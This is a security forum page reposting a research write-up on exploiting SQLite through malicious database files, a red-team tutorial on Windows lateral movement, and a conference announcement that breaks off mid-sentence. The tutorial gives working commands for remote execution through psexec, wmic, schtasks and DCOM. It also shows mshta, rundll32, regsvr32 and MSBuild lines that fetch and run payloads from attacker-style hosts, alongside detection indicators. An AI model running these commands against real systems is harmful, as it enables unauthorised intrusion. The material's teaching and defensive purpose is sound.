Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 08/19/19 in all areas

  1. SELECT code_execution FROM * USING SQLite; August 10, 2019 Gaining code execution using a malicious SQLite database Research By: Omer Gull tl;dr SQLite is one of the most deployed software in the world. However, from a security perspective, it has only been examined through the lens of WebSQL and browser exploitation. We believe that this is just the tip of the iceberg. In our long term research, we experimented with the exploitation of memory corruption issues within SQLite without relying on any environment other than the SQL language. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved it is possible to reliably exploit memory corruptions issues in the SQLite engine. We demonstrate these techniques a couple of real-world scenarios: pwning a password stealer backend server, and achieving iOS persistency with higher privileges. We hope that by releasing our research and methodology, the security research community will be inspired to continue to examine SQLite in the countless scenarios where it is available. Given the fact that SQLite is practically built-in to every major OS, desktop or mobile, the landscape and opportunities are endless. Furthermore, many of the primitives presented here are not exclusive to SQLite and can be ported to other SQL engines. Welcome to the brave new world of using the familiar Structured Query Language for exploitation primitives. Motivation This research started when omriher and I were looking at the leaked source code of some notorious password stealers. While there are plenty of password stealers out there (Azorult, Loki Bot, and Pony to name a few), their modus operandi is mostly the same: A computer gets infected, and the malware either captures credentials as they are used or collects stored credentials maintained by various clients. It is not uncommon for client software to use SQLite databases for such purposes. After the malware collects these SQLite files, it sends them to its C2 server where they are parsed using PHP and stored in a collective database containing all of the stolen credentials. Skimming through the leaked source code of such password stealers, we started speculating about the attack surface described above. Can we leverage the load and query of an untrusted database to our advantage? Such capabilities could have much bigger implications in countless scenarios, as SQLite is one of the most widely deployed pieces of software out there. A surprisingly complex code base, available in almost any device imaginable. is all the motivation we needed, and so our journey began. SQLite Intro The chances are high that you are currently using SQLite, even if you are unaware of it. To quote its authors: SQLite is a C-language library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day. Unlike most other SQL databases, SQLite does not have a separate server process. SQLite reads and writes directly to ordinary disk files. A complete SQL database with multiple tables, indices, triggers, and views is contained within a single disk file. Attack Surface The following snippet is a fairly generic example of a password stealer backend. Given the fact that we control the database and its content, the attack surface available to us can be divided into two parts: The load and initial parsing of our database, and the SELECT query performed against it. The initial loading done by sqlite3_open is actually a very limited surface; it is basically a lot of setup and configuration code for opening the database. Our surface is mainly the header parsing which is battle-tested against AFL. Things get more interesting as we start querying the database. Using SQLite authors’ words: “The SELECT statement is the most complicated command in the SQL language.” Although we have no control over the query itself (as it is hardcoded in our target), studying the SELECT process carefully will prove beneficial in our quest for exploitation. As SQLite3 is a virtual machine, every SQL statement must first be compiled into a byte-code program using one of the sqlite3_prepare* routines. Among other operations, the prepare function walks and expands all SELECT subqueries. Part of this process is verifying that all relevant objects (like tables or views) actually exist and locating them in the master schema. sqlite_master and DDL Every SQLite database has a sqlite_master table that defines the schema for the database and all of its objects (such as tables, views, indices, etc.). The sqlite_master table is defined as: The part that is of special interest to us is the sql column. This field is the DDL (Data Definition Language) used to describe the object. In a sense, the DDL commands are similar to C header files. DDL commands are used to define the structure, names, and types of the data containers within a database, just as a header file typically defines type definitions, structures, classes, and other data structures. These DDL statements actually appear in plain-text if we inspect the database file: During the query preparation, sqlite3LocateTable() attempts to find the in-memory structure that describes the table we are interested in querying. sqlite3LocateTable() reads the schema available in sqlite_master, and if this is the first time doing it, it also has a callback for every result that verifies the DDL statement is valid and build the necessary internal data structures that describe the object in question. DDL Patching Learning about this preparation process, we asked, can we simply replace the DDL that appears in plain-text within the file? If we could inject our own SQL to the file perhaps we can affect its behaviour. Based on the code snippet above, it seems that DDL statements must begin with “create “. With this limitation in mind, we needed to assess our surface. Checking SQLite’s documentation revealed that these are the possible objects we can create: The CREATE VIEW command gave us an interesting idea. To put it very simply, VIEWs are just pre-packaged SELECT statements. If we replace the table expected by the target software with a compatible VIEW, interesting opportunities reveal themselves. Hijack Any Query Imagine the following scenario: The original database has a single TABLE called dummy that is defined as: The target software queries it with the following: We can actually hijack this query if we craft dummy as a VIEW: This “trap” VIEW enables us to hijack the query – meaning we generate a completely new query that we totally control. This nuance greatly expands our attack surface, from the very minimal parsing of the header and an uncontrollable query performed by the loading software, to the point where we can now interact with vast parts of the SQLite interpreter by patching the DDL and creating our own views with sub-queries. Now that we can interact with the SQLite interpreter, our next question was what exploitation primitives are built into SQLite? Does it allow any system commands, reading from or writing to the filesystem? As we are not the first to notice the huge SQLite potential from an exploitation perspective, it makes sense to review prior work done in the field. We started from the very basics. SQL Injections As researchers, it’s hard for us to even spell SQL without the “i”, so it seems like a reasonable place to start. After all, we want to familiarize ourselves with the internal primitives offered by SQLite. Are there any system commands? Can we load arbitrary libraries? It seems that the most straightforward trick involves attaching a new database file and writing to it using something along the lines of: We attach a new database, create a single table and insert a single line of text. The new database then creates a new file (as databases are files in SQLite) with our web shell inside it. The very forgiving nature of the PHP interpreter parses our database until it reaches the PHP open tag of “<?”. Writing a webshell is definitely a win in our password stealers scenario, however, as you recall, DDL cannot begin with “ATTACH” Another relevant option is the load_extension function. While this function should allow us to load an arbitrary shared object, it is disabled by default. Memory Corruptions In SQLite Like any other software written in C, memory safety issues are definitely something to consider when assessing the security of SQLite. In his great blog post, Michał Zalewski described how he fuzzed SQLite with AFL to achieve some impressive results: 22 bugs in just 30 minutes of fuzzing. Interestingly, SQLite has since started using AFL as an integral part of their remarkable test suite. These memory corruptions were all treated with the expected gravity (Richard Hip and his team deserve tons of respect). However, from an attacker’s perspective, these bugs would prove to be a difficult path to exploitation without a decent framework to leverage them. Modern mitigations pose a major obstacle in exploiting memory corruption issues and attackers need to find a more flexible environment. The Security Research community would soon find the perfect target! Web SQL Web SQL Database is a web page API for storing data in databases that can be queried using a variant of SQL through JavaScript.The W3C Web Applications Working Group ceased working on the specification in November 2010, citing a lack of independent implementations other than SQLite. Currently, the API is still supported by Google Chrome, Opera and Safari. All of them use SQLite as the backend of this API. Untrusted input into SQLite, reachable from any website inside some of the most popular browsers, caught the security community’s attention and as a result, the number of vulnerabilities began to rise. Suddenly, bugs in SQLite could be leveraged by the JavaScript interpreter to achieve reliable browser exploitation. Several impressive research reports have been published: Low hanging fruits like CVE-2015-7036 Untrusted pointer dereference fts3_tokenizer() More complex exploits presented in Blackhat 17 by the Chaitin team Type confusion in fts3OptimizeFunc() The recent Magellan bugs exploited by Exodus Integer overflow in fts3SegReaderNext() A clear pattern in past WebSQL research reveals that a virtual table module named ”FTS” might be an interesting target for our research. FTS Full-Text Search (FTS) is a virtual table module that allows textual searches on a set of documents. From the perspective of an SQL statement, the virtual table object looks like any other table or view. But behind the scenes, queries on a virtual table invoke callback methods on shadow tables instead of the usual reading and writing on the database file. Some virtual table implementations, like FTS, make use of real (non-virtual) database tables to store content. For example, when a string is inserted into the FTS3 virtual table, some metadata must be generated to allow for an efficient textual search. This metadata is ultimately stored in real tables named “%_segdir” and “%_segments”, while the content itself is stored in “”%_content” where “%” is the name of the original virtual table. These auxiliary real tables that contain data for a virtual table are called “shadow tables” Due to their trusting nature, interfaces that pass data between shadow tables provide a fertile ground for bugs. CVE-2019-8457,- a new OOB read vulnerability we found in the RTREE virtual table module, demonstrates this well. RTREE virtual tables, used for geographical indexing, are expected to begin with an integer column. Therefore, other RTREE interfaces expect the first column in an RTREE to be an integer. However, if we create a table where the first column is a string, as shown in the figure below, and pass it to the rtreenode() interface, an OOB read occurs. Now that we can use query hijacking to gain control over a query, and know where to find vulnerabilities, it’s time to move on to exploit development. SQLite Internals For Exploit Development Previous publications on SQLite exploitation clearly show that there has always been a necessity for a wrapping environment, whether it is the PHP interpreter seen in this awesome blog post on abusing SQLite tokenizers or the more recent work on Web SQL from the comfort of a JavaScript interpreter. As SQLite is pretty much everywhere, limiting its exploitation potential sounded like low-balling to us and we started exploring the use of SQLite internals for exploitation purposes. The research community became pretty good at utilizing JavaScript for exploit development. Can we achieve similar primitives with SQL? Bearing in mind that SQL is Turing complete ([1], [2]), we started creating a primitive wish-list for exploit development based on our pwning experience. A modern exploit written purely in SQL has the following capabilities: Memory leak. Packing and unpacking of integers to 64-bit pointers. Pointer arithmetics. Crafting complex fake objects in memory. Heap Spray. One by one, we will tackle these primitives and implement them using nothing but SQL. For the purpose of achieving RCE on PHP7, we will utilize the still unfixed 1-day of CVE-2015-7036. Wait, what? How come a 4-year-old bug has never been fixed? It is actually an interesting story and a great example of our argument. This feature was only ever considered vulnerable in the context of a program that allows arbitrary SQL from an untrusted source (Web SQL), and so it was mitigated accordingly. However, SQLite usage is so versatile that we can actually still trigger it in many scenarios 🙂 Exploitation Game-plan CVE-2015-7036 is a very convenient bug to work with. In a nutshell, the vulnerable fts3_tokenizer() function returns the tokenizer address when called with a single argument (like “simple”, “porter” or any other registered tokenizer). When called with 2 arguments, fts3_tokenizer overrides the tokenizer address in the first argument with the address provided by a blob in the second argument. After a certain tokenizer has been overridden, any new instance of the fts table that uses this tokenizer allows us to hijack the flow of the program. Our exploitation game-plan: Leak a tokenizer address Compute the base address Forge a fake tokenizer that will execute our malicious code Override one of the tokenizers with our malicious tokenizer Instantiate an fts3 table to trigger our malicious code Now back to our exploit development. Query Oriented Programming © We are proud to present our own unique approach for exploit development using the familiar structured query language. We share QOP with the community in the hope of encouraging researchers to pursue the endless possibilities of database engines exploitation. Each of the following primitives is accompanied by an example from the sqlite3 shell. While this will give you a hint of what want to achieve, keep in mind that our end goal is to plant all those primitives in the sqlite_master table and hijack the queries issued by the target software that loads and queries our malicious SQLite db file Memory Leak – Binary Mitigations such as ASLR definitely raised the bar for memory corruptions exploitation. A common way to defeat it is to learn something about the memory layout around us. This is widely known as Memory Leak. Memory leaks are their own sub-class of vulnerabilities, and each one has a slightly different setup. In our case, the leak is the return of a BLOB by SQLite. These BLOBs make a fine leak target as they sometimes hold memory pointers. The vulnerable fts3_tokenizer() is called with a single argument and returns the memory address of the requested tokenizer. hex() makes it readable by humans. We obviously get some memory address, but it is reversed due to little-endianity. Surely we can flip it using some SQLite built-in string operations. substr() seems to be a perfect fit! We can read little-endian BLOBs but this raises another question: how do we store things? QOP Chain Naturally, storing data in SQL requires an INSERT statement. Due to the hardened verification of sqlite_master, we can’t use INSERT as all of the statements must start with “CREATE “. Our approach to this challenge is to simply store our queries under a meaningful VIEW and chain them together. The following example makes it a bit clearer: This might not seem like a big difference, but as our chain gets more complicated, being able to use pseudo-variables will surely make our life easier. Unpacking of 64-bit pointers If you’ve ever done any pwning challenges, the concept of packing and unpacking of pointers should not be foreign. This primitive should make it easy to convert our hexadecimal values (like the leak we just achieved) to integers. Doing so allows us to perform various calculations on these pointers in the next steps. This query iterates a hexadecimal string char by char in a reversed fashion using substr(). A translation of this char is done using this clever trick with the minor adjustment of instr() which is 1-based. All that is needed now is the proper shift that is on the right of the * sign. Pointer arithmetics Pointer arithmetics is a fairly easy task with integers at hand. For example, extracting the image base from our leaked tokenizer pointer is as easy as: Packing of 64-bit pointers After reading leaked pointers and manipulating them to our will, it makes sense to pack them back to their little-endian form so we can write them somewhere. SQLite char() should be of use here as its documentation states that it will “return a string composed of characters having the Unicode code point values of an integer.” It proved to work fairly well, but only on a limited range of integers Larger integers were translated to their 2-bytes code-points. After banging our heads against SQLite documentation, we suddenly had a strange epiphany: our exploit is actually a database. We can prepare beforehand a table that maps integers to their expected values. Now our pointer packing query is the following: Crafting complex fake objects in memory Writing a single pointer is definitely useful, but still not enough. Many memory safety issues exploitation scenarios require the attackers to forge some object or structure in memory or even write a ROP chain. Essentially, we will string several of the building blocks we presented earlier. For example, let’s forge our own tokenizer, as explained here. Our fake tokenizer should conform to the interface expected by SQLite defined here: Using the methods described above and a simple JOIN query, we are able to fake the desired object quite easily. Verifying the result in a low-level debugger, we see that indeed a fake tokenizer object was created. Heap Spray Now that we crafted our fake object, it is sometimes useful to spray the heap with it. This should ideally be some repetitive form of the latter. Unfortunately, SQLite does not implement the REPEAT() function like MySQL. However, this thread gave us an elegant solution. The zeroblob(N) function returns a BLOB consisting of N bytes while we use replace() to replace those zeros with our fake object. Searching for those 0x41s shows we also achieved a perfect consistency. Notice the repetition every 0x20 bytes. Memory Leak – Heap Looking at our exploitation game plan, it seems like we are moving in the right direction. We already know where the binary image is located, we were able to deduce where the necessary functions are, and spray the heap with our malicious tokenizer. Now it’s time to override a tokenizer with one of our sprayed objects. However, as the heap address is also randomized, we don’t know where our spray is allocated. A heap leak requires us to have another vulnerability. Again, we will target a virtual table interface. As virtual tables use underlying shadow tables, it is quite common for them to pass raw pointers between different SQL interfaces. Note: This exact type of issue was mitigated in SQLite 3.20. Fortunately, PHP7 is compiled with an earlier version. In case of an updated version, CVE-2019-8457 could be used here as well. To leak the heap address, we need to generate an fts3 table beforehand and abuse its MATCH interface. Just as we saw in our first memory leak, the pointer is little-endian so it needs to be reversed. Fortunately, we already know how to do so using SUBSTR(). Now that we know our heap location, and can spray properly, we can finally override a tokenizer with our malicious tokenizer! Putting It All Together With all the desired exploitation primitives at hand, it’s time to go back to where we started: exploiting a password stealer C2. As explained above, we need to set up a “trap” VIEW to kickstart our exploit. Therefore, we need to examine our target and prepare the right VIEW. As seen in the snippet above, our target expects our db to have a table called Notes with a column called BodyRich inside it. To hijack this query, we created the following VIEW After Notes is queried, 3 QOP Chains execute. Let’s analyze the first one of them. heap_spray Our first QOP chain should populate the heap with a large amount of our malicious tokenizer. p64_simple_create, p64_simple_destroy, and p64_system are essentially all chains achieved with our leak and packing capabilities. For example, p64_simple_create is constructed as: As these chains get pretty complex, pretty fast, and are quite repetitive, we created QOP.py. QOP.py makes things a bit simpler by generating these queries in pwntools style. Creating the previous statements becomes as easy as: Demo COMMIT; Now that we have established a framework to exploit any situation where the querier cannot be sure that the database is non-malicious, let’s explore another interesting use case for SQLite exploitation. iOS Persistency Persistency is hard to achieve on iOS as all executable files must be signed as part of Apple’s Secure Boot. Luckily for us, SQLite databases are not signed. Utilizing our new capabilities, we will replace one of the commonly used databases with a malicious version. After the device reboots and our malicious database is queried, we gain code execution. To demonstrate this concept, we replace the Contacts DB “AddressBook.sqlitedb”. As done in our PHP7 exploit, we create two extra DDL statements. One DDL statement overrides the default tokenizer “simple”, and the other DDL statement triggers the crash by trying to instantiate the overridden tokenizer. Now, all we have to do is re-write every table of the original database as a view that hijacks any query performed and redirect it toward our malicious DDL. Replacing the contacts db with our malicious contacts db and rebooting results in the following iOS crashdump: As expected, the contacts process crashed at 0x4141414141414149 where it expected to find the xCreate constructor of our false tokenizer. Furthermore, the contacts db is actually shared among many processes. Contacts, Facetime, Springboard, WhatsApp, Telegram and XPCProxy are just some of the processes querying it. Some of these processes are more privileged than others. Once we proved that we can execute code in the context of the querying process, this technique also allows us to expand and elevate our privileges. Our research and methodology have all been responsibly disclosed to Apple and were assigned the following CVEs: CVE-2019-8600 CVE-2019-8598 CVE-2019-8602 CVE-2019-8577 Future Work Given the fact that SQLite is practically built-in to almost any platform, we think that we’ve barely scratched the tip of the iceberg when it comes to its exploitation potential. We hope that the security community will take this innovative research and the tools released and push it even further. A couple of options we think might be interesting to pursue are Creating more versatile exploits. This can be done by building exploits dynamically by choosing the relevant QOP gadgets from pre-made tables using functions such as sqlite_version() or sqlite_compileoption_used(). Achieving stronger exploitation primitives such as arbitrary R/W. Look for other scenarios where the querier cannot verify the database trustworthiness. Conclusion We established that simply querying a database may not be as safe as you expect. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved that memory corruption issues in SQLite can now be reliably exploited. As our permissions hierarchies become more segmented than ever, it is clear that we must rethink the boundaries of trusted/untrusted SQL input. To demonstrate these concepts, we achieved remote code execution on a password stealer backend running PHP7 and gained persistency with higher privileges on iOS. We believe that these are just a couple of use cases in the endless landscape of SQLite. Check Point IPS Product Protects against this threat: “SQLite fts3_tokenizer Untrusted Pointer Remote Code Execution (CVE-2019-8602).” Sursa: https://research.checkpoint.com/select-code_execution-from-using-sqlite/
    2 points
  2. Offensive Lateral Movement Hausec Infosec August 12, 2019 12 Minutes Lateral movement is the process of moving from one compromised host to another. Penetration testers and red teamers alike commonly used to accomplish this by executing powershell.exe to run a base64 encoded command on the remote host, which would return a beacon. The problem with this is that offensive PowerShell is not a new concept anymore and even moderately mature shops will detect on it and shut it down quickly, or any half decent AV product will kill it before a malicious command is ran. The difficulty with lateral movement is doing it with good operational security (OpSec) which means generating the least amount of logs as possible, or generating logs that look normal, i.e. hiding in plain sight to avoid detection. The purpose is to not only show the techniques, but to show what is happening under the hood and any indicators associated with them. I’ll be referencing some Cobalt Strike syntax throughout this post, as it’s what we primarily use for C2, however Cobalt Strike’s built-in lateral movement techniques are quite noisy and not OpSec friendly. In addition, I understand not everyone has Cobalt Strike, so Meterpreter is also referenced in most examples, but the techniques are universal. There’s several different lateral movement techniques out there and I’ll try to cover the big ones and how they work from a high level overview, but before doing covering the methods, let’s clarify a few terms. Named Pipe: A way that processes communicate with each other via SMB (TCP 445). Operates on Layer 5 of the OSI model. Similar to how a port can listen for connections, a named pipe can also listen for requests. Access Token: Per Microsoft’s documentation: An access token is an object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the process or thread. When a user logs on, the system verifies the user’s password by comparing it with information stored in a security database. When a user’s credentials are authenticated, the system produces an access token. Every process executed on behalf of this user has a copy of this access token. In another way, it contains your identity and states what you can and can’t use on the system. Without diving too deep into Windows authentication, access tokens reference logon sessions which is what’s created when a user logs into Windows. Network Logon (Type 3): Network logons occur when an account authenticates to a remote system/service. During network authentication, reusable credentials are not sent to the remote system. Consequently, when a user logs into a remote system via a network logon, the user’s credentials will not be present on the remote system to perform further authentication. This brings in the double-hop problem, meaning if we have a one-liner that connects to one target via Network logon, then also reaches out via SMB, no credentials are present to login over SMB, therefore login fails. Examples shown further below. PsExec PsExec comes from Microsoft’s Sysinternals suite and allows users to execute Powershell on remote hosts over port 445 (SMB) using named pipes. It first connects to the ADMIN$ share on the target, over SMB, uploads PSEXESVC.exe and uses Service Control Manager to start the .exe which creates a named pipe on the remote system, and finally uses that pipe for I/O. An example of the syntax is the following: psexec \\test.domain -u Domain\User -p Password ipconfig Cobalt Strike (CS) goes about this slightly differently. It first creates a Powershell script that will base64 encode an embedded payload which runs from memory and is compressed into a one-liner, connects to the ADMIN$ or C$ share & runs the Powershell command, as shown below The problem with this is that it creates a service and runs a base64 encoded command, which is not normal and will set off all sorts of alerts and generate logs. In addition, the commands sent are through named pipes, which has a default name in CS (but can be changed). Red Canary wrote a great article on detecting it. Cobalt Strike has two PsExec built-ins, one called PsExec and the other called PsExec (psh). The difference between the two, and despite what CS documentation says, PsExec (psh) is calling Powershell.exe and your beacon will be running as a Powershell.exe process, where PsExec without the (psh) will be running as rundll32.exe. Viewing the process IDs via Cobalt Strike By default, PsExec will spawn the rundll32.exe process to run from. It’s not dropping a DLL to disk or anything, so from a blue-team perspective, if rundll32.exe is running without arguments, it’s VERY suspicious. SC Service Controller is exactly what it sounds like — it controls services. This is particularly useful as an attacker because scheduling tasks is possible over SMB, so the syntax for starting a remote service is: sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe” sc \\host.domain start ExampleService The only caveat to this is that the executable must be specifically a service binary. Service binaries are different in the sense that they must “check in” to the service control manager (SCM) and if it doesn’t, it will exit execution. So if a non-service binary is used for this, it will come back as an agent/beacon for a second, then die. In CS, you can specifically craft service executables: Generating a service executable via Cobalt Strike Here is the same attack but with Metasploit: WMI Windows Management Instrumentation (WMI) is built into Windows to allow remote access to Windows components, via the WMI service. Communicating by using Remote Procedure Calls (RPCs) over port 135 for remote access (and an ephemeral port later), it allows system admins to perform automated administrative tasks remotely, e.g. starting a service or executing a command remotely. It can interacted with directly via wmic.exe. An example WMI query would look like this: wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” Cobalt Strike leverages WMI to execute a Powershell payload on the target, so PowerShell.exe is going to open when using the WMI built-in, which is an OpSec problem because of the base64 encoded payload that executes. So we see that even through WMI, a named piped is created despite wmic.exe having the capability to run commands on the target via PowerShell, so why create a named pipe in the first place? The named pipe isn’t necessary for executing the payload, however the payload CS creates uses the named pipe for communication (over SMB). This is just touching the surface of the capabilities of WMI. My co-worker @mattifestation gave an excellent talk during Blackhat 2015 on it’s capabilities, which can be read here. WinRM Windows Remote Management allows management of server hardware and it’s also Microsoft’s way of using WMI over HTTP(S). Unlike traditional web traffic, it doesn’t use 80/443, but instead uses 5985 (HTTP) and 5986 (HTTPS). WinRM comes installed with Windows by default, but does need some setup in order to be used. The exception to this being server OSs, as it’s on by default since 2012R2 and beyond. WinRM requires listeners (sound familiar?) on the client and even if the WinRM service is started, a listener has to be present in order for it to process requests. This can be done via the command in Powershell, or remotely done via WMI & Powershell: Enable-PSRemoting -Force From a non-CS perspective (replace calc.exe with your binary): winrs -r:EXAMPLE.lab.local -u:DOMAIN\user -p:password calc.exe Executing with CobaltStrike: The problem with this, of course, is that it has to be started with PowerShell. If you’re talking in remote terms, then it needs to be done via DCOM or WMI. While opening up PowerShell is not weird and starting a WinRM listener might fly under the radar, the noisy part comes when executing the payload, as there’s an indicator when running the built-in WinRM module from Cobalt Strike. With the indicator being: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile SchTasks SchTasks is short for Scheduled Tasks and operates over port 135 initially and then continues communication over an ephemeral port, using the DCE/RPC for communication. Similar to creating a cron-job in Linux, you can schedule a task to occur and execute whatever you want. From just PS: schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /RU System schtasks /run /tn ExampleTask /S host.domain schtasks /F /delete /tn ExampleTask /S host.domain In CobaltStrike: shell schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /RU System shell schtasks /run /tn ExampleTask /S host.domain Then delete the job (opsec!) shell schtasks /F /delete /tn ExampleTask /S host.domain MSBuild While not a lateral movement technique, it was discovered in 2016 by Casey Smith that MSBuild.exe can be used in conjunction with some of the above methods in order to avoid dropping encoded Powershell commands or spawning cmd.exe. MSBuild.exe is a Microsoft signed executable that comes installed with the .NET framework package. MSBuild is used to compile/build C# applications via an XML file which provides the schema. From an attacker perspective, this is used to compiled C# code to generate malicious binaries or payloads, or even run a payload straight from an XML file. MSBuild also can compile over SMB, as shown in the syntax below C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe \\host.domain\path\to\XMLfile.xml XML Template: https://gist.githubusercontent.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17/raw/df62c7256701d486fcd1e063487f24b599658a7b/shellcode.xml What doesn’t work: wmic /node:LABWIN10.lab.local /user:LAB\Administrator /password:Password! process call create "c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe \\LAB2012DC01.LAB.local\C$\Windows\Temp\build.xml" Trying to use wmic to call msbuild.exe to build an XML over SMB will fail because of the double-hop problem. The double-hop problem occurs when a network-logon (type 3) occurs, which means credentials are never actually sent to the remote host. Since the credentials aren’t sent to the remote host, the remote host has no way of authenticating back to the payload hosting server. In Cobalt Strike, this is often experienced while using wmic and the workaround is to make a token for that user, so the credentials are then able to be passed on from that host. However, without CS, there’s a few options to get around this: Locally host the XML file (drop to disk) copy C:\Users\Administrator\Downloads\build.xml \\LABWIN10.lab.local\C$\Windows\Temp\ wmic /node:LABWIN10.lab.local /user:LAB\Administrator /password:Password! process call create "c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe C:\Windows\Temp\build.xml" Host the XML via WebDAV (Shown further below) Use PsExec psexec \\host.domain -u Domain\Tester -p Passw0rd c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe \\host.domain\C$\Windows\Temp\build.xml" In Cobalt Strike, there’s an Aggressor Script extension that uses MSBuild to execute Powershell commands without spawning Powershell by being an unmanaged process (binary compiled straight to machine code). This uploads via WMI/wmic.exe. https://github.com/Mr-Un1k0d3r/PowerLessShell The key indicator with MSBuild is that it’s executing over SMB and MSBuild is making an outbound connection. MSBuild.exe calling the ‘QueryNetworkOpenInformationFile’ operation, which is an IOC. DCOM Component Object Model (COM) is a protocol used by processes with different applications and languages so they communicate with one another. COM objects cannot be used over a network, which introduced the Distributed COM (DCOM) protocol. My brilliant co-worker Matt Nelson discovered a lateral movement technique via DCOM, via the ExecuteShellCommand Method in the Microsoft Management Console (MMC) 2.0 scripting object model which is used for System Management Server administrative functions. It can be called via the following [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.10.30")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0") DCOM uses network-logon (type 3), so the double-hop problem is also encountered here. PsExec eliminates the double-hop problem because credentials are passed with the command and generates an interactive logon session (Type 2), however, the problem is that the ExecuteShellCommand method only allows four arguments, so if anything less than or more than four is passed in, it errors out. Also, spaces have to be their own arguments (e.g. “cmd.exe”,$null,”/c” is three arguments), which eliminates the possibility of using PsExec with DCOM to execute MSBuild. From here, there’s a few options. Use WebDAV Host the XML file on an SMB share that doesn’t require authentication (e.g. using Impacket’s SMBServer.py, but most likely requires the attacker to have their attacking machine on the network) Try other similar ‘ExecuteShellCommand’ methods With WebDAV, it still utilizes a UNC path, but Windows will eventually fall back to port 80 if it cannot reach the path over 445 and 139. With WebDAV, SSL is also an option. The only caveat to this is the WebDAV does not work on servers, as the service does not exist on server OSs by default. [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.10.30")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\192.168.10.131\webdav\build.xml","7") This gets around the double-hop problem by not requiring any authentication to access the WebDAV server (which in this case, is also the C2 server). As shown in the video, the problem with this method is that it spawns two processes: mmc.exe because of the DCOM method call from MMC2.0 and MSBuild.exe. In addition, this does write to disk temporarily. Webdav writes to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV and does not clean up any files after execution. MSBuild temporarily writes to C:\Users\[USER]\AppData\Local\Temp\[RANDOM]\ and does clean up after itself. The neat thing with this trick is that since MSBuild used Webdav, MSbuild cleans up the files Webdav created. Other execution DCOM methods and defensive suggestions are in this article. Remote File Upload Not necessarily a lateral movement technique, it’s worth noting that you can instead spawn your own binary instead of using Cobalt Strikes built-ins, which (could be) more stealthy. This works by having upload privileges over SMB (i.e. Administrative rights) to the C$ share on the target, which you can then upload a stageless binary to and execute it via wmic or DCOM, as shown below. Notice the beacon doesn’t “check in”. It needs to be done manually via the command link target.domain Without CS: copy C:\Windows\Temp\Malice.exe \\target.domain\C$\Windows\Temp wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\Temp\Malice.exe” Other Code Execution Options There’s a few more code execution options that are possible, that require local execution instead of remote, so like MSBuild, these have to be paired with a lateral movement technique. Mshta Mshta.exe is a default installed executable on Windows that allows the execution of .hta files. .hta files are Microsoft HTML Application files and allow execution of Visual Basic scripts within the HTML application. The good thing about Mshta is that allows execution via URL and since it’s a trusted Microsoft executable, should bypass default app-whitelisting. mshta.exe https://malicious.domain/runme.hta Rundll32 This one is relatively well known. Rundll32.exe is again, a trusted Windows binary and is meant to execute DLL files. The DLL can be specified via UNC WebDAV path or even via JavaScript rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" Since it’s running DLLs, you can pair it with a few other ones for different techniques: URL.dll: Can run .url (shortcut) files; Also can run .hta files rundll32.exe url.dll,OpenURL "C:\Windows\Temp\test.hta" ieframe.dll: Can run .url files Example .url file: [InternetShortcut] URL=file:///c:\windows\system32\cmd.exe shdocvw.dll: Can run .url files as well Regsvr32 Register Server is used to register and unregister DLLs for the registry. Regsrv32.exe is a signed Microsoft binary and can accept URLs as an argument. Specifically, it will run a .sct file which is an XML document that allows registration of COM objects. regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll Read Casey Smith’s writeup for more in-depth explanation. Conclusion Once again, this list is not comprehensive, as there’s more techniques out there. This was simply me documenting a few things I didn’t know and figuring out how things work under the hood. When learning Cobalt Strike I learned that the built-ins are not OpSec friendly which could lead to the operator getting caught, so I figured I’d try to at least document some high level IOCs. I encourage everyone to view the MITRE ATT&CK Knowledge Base to read up more on lateral movement and potential IOCs. Feel free to reach out to me on Twitter with questions, @haus3c Share this: Twitter Facebook Published by Hausec View all posts by Hausec Published August 12, 2019 Sursa: https://hausec.com/2019/08/12/offensive-lateral-movement/
    2 points
  3. Maday.conf ( https://www.mayday-conf.com ) este prima conferinta internationala de cyber security din Cluj Napoca (24-25 octombrie) iar RST este community partener al evenimentului. Acest eveniment s-a nascut din pasiunea pentru security si isi doreste in primul rand sa ajute la dezvoltarea oamenilor care sunt interesati de acest domeniu. In timpul evenimentului o sa aiba loc prezentari referitoare la ultimele tehnici folosite de pentesteri, de Incident Responders dar si lucruri precum identificarea TTPs folosite de catre atacatori. Mai mult, in cadrul evenimentului o sa avem CTF-uri cu premii, exercitii cyber dar si workshop-uri. Pentru a primi notificari in timp real va puteti abona la newsletter pe www.mayday-conf.com, follow la pagina de Facebook ( https://www.facebook.com/MayDayCon ) / Twitter ( https://twitter.com/ConfMayday) sau intra pe grupul de Slack ( https://maydayconf.slack.com/join/shared_invite/enQtNTc5Mzk0NTk0NTk3LWVjMTFhZWM2MTVlYmQzZjdkMDQ5ODI1NWM3ZDVjZGJkYjNmOGUyMjAxZmQyMDlkYzg5YTQxNzRmMmY3NGQ1MGM) Acum urmeaza surpriza... Pentru ca "sharing is caring" organizatorii ofera membrilor RST 10 vouchere de acces pentru ambele zile. Acestea pot fi obtinute printr-un private message catre Nytro (care sa includa o adresa de email) pana la data de 1 septembrie iar selectia se va face in functie de urmatoarele criterii: - numarul de postari pe forum - numarul de 